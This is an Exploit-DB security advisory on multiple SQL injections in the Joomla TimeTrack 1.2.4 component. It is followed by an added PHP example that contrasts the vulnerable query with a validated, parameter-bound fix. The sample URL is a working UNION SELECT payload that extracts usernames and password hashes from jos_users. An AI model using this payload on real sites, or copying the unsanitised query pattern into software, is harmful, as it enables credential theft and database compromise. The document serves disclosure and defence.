Joomla! Component TimeTrack 1.2.4 – Multiple SQL Injections

  • Author: Salvatore Fresta
    Date: 2010-09-22
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15084/
  • TimeTrack 1.2.4 Joomla Component Multiple SQL Injection Vulnerabilities
    
     Name              TimeTrack
     Vendor            http://www.itrn.de
     Versions Affected 1.2.4
    
     Author            Salvatore Fresta aka Drosophila
     Website           http://www.salvatorefresta.net
     Contact           salvatorefresta [at] gmail [dot] com
     Date              2010-09-22
    
    X. INDEX
    
     I.   ABOUT THE APPLICATION
     II.  DESCRIPTION
     III. ANALYSIS
     IV.  SAMPLE CODE
     V.   FIX
     
    
    I. ABOUT THE APPLICATION
    ________________________
    
    TimeTrack is a time tracking Component for Joomla! 1.5
    to collect, categorize and evaluate working hours and
    services. Monthly Reports can be generated and exported as
    PDF or CSV file.
    
    
    II. DESCRIPTION
    _______________
    
    Many numeric parameters are not properly sanitised before
    being used in a SQL query. This can be exploited to
    manipulate SQL queries by injecting arbitrary SQL code.
    
    
    III. ANALYSIS
    _____________
    
    Summary:
    
     A) Multiple SQL Injection
     
    
    A) Multiple SQL Injection
    _________________________
    
    Each module is vulnerable to SQL Injection because none of
    the numeric fields (such as ct_id) are sanitised before they
    reach the query.
    
    
    IV. SAMPLE CODE
    _______________
    
    A) Multiple SQL Injection
    
    http://host/path/components/index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
    
    
    V. FIX
    ______
    
    No fix.
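    The root cause described in sections II and III is a numeric request
    parameter interpolated straight into SQL. The following PHP script is an
    added example, not TimeTrack's code or the advisory author's: it shows the
    vulnerable pattern beside a hardened version that validates the parameter
    as an integer and binds it. It runs against an in-memory SQLite database
    with constructed tables and rows (the table and column names are stand-ins,
    and the payload is modelled on the advisory's URL with SQLite's `||` in
    place of `CONCAT`). In a Joomla! 1.5 component the equivalent hardening is
    to read the value with `JRequest::getInt()` and pass it through
    `$db->Quote()` or an integer cast before building the query.

```php
<?php
// Added example (not vendor code): unsanitised numeric parameter vs. a
// validated, bound parameter. Requires PHP with the pdo_sqlite extension.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed schema standing in for the component's tables.
$db->exec('CREATE TABLE timetrack (id INTEGER, task TEXT, hours REAL)');
$db->exec('CREATE TABLE jos_users (username TEXT, password TEXT)');
$db->exec("INSERT INTO timetrack VALUES (1, 'design', 2.5), (2, 'review', 1.0)");
$db->exec("INSERT INTO jos_users VALUES ('admin', 'hash-placeholder')");

// Vulnerable pattern: the raw request value is concatenated into the query,
// so a value like "-1 UNION SELECT ..." changes the statement's meaning.
function vulnerableLookup(PDO $db, string $ctId): array
{
    $sql = "SELECT id, task, hours FROM timetrack WHERE id = $ctId";
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened pattern: accept only a plain integer, then bind it so the
// database never parses the value as SQL.
function hardenedLookup(PDO $db, string $ctId): array
{
    if (filter_var($ctId, FILTER_VALIDATE_INT) === false) {
        throw new InvalidArgumentException('ct_id must be an integer');
    }
    $stmt = $db->prepare('SELECT id, task, hours FROM timetrack WHERE id = :id');
    $stmt->execute([':id' => (int) $ctId]);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Constructed payload modelled on the advisory's sample URL.
$payload = "-1 UNION SELECT 1, username || ':' || password, 3 FROM jos_users";

echo "vulnerable:\n";
print_r(vulnerableLookup($db, $payload));   // returns the jos_users row

echo "hardened:\n";
try {
    hardenedLookup($db, $payload);
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n"; // payload never reaches SQLite
}
print_r(hardenedLookup($db, '2'));           // legitimate request still works
```

    Validation and binding are both needed: the integer check gives a clear
    error for malformed input, and the bound parameter guarantees that even a
    value which slips past validation is treated as data rather than SQL.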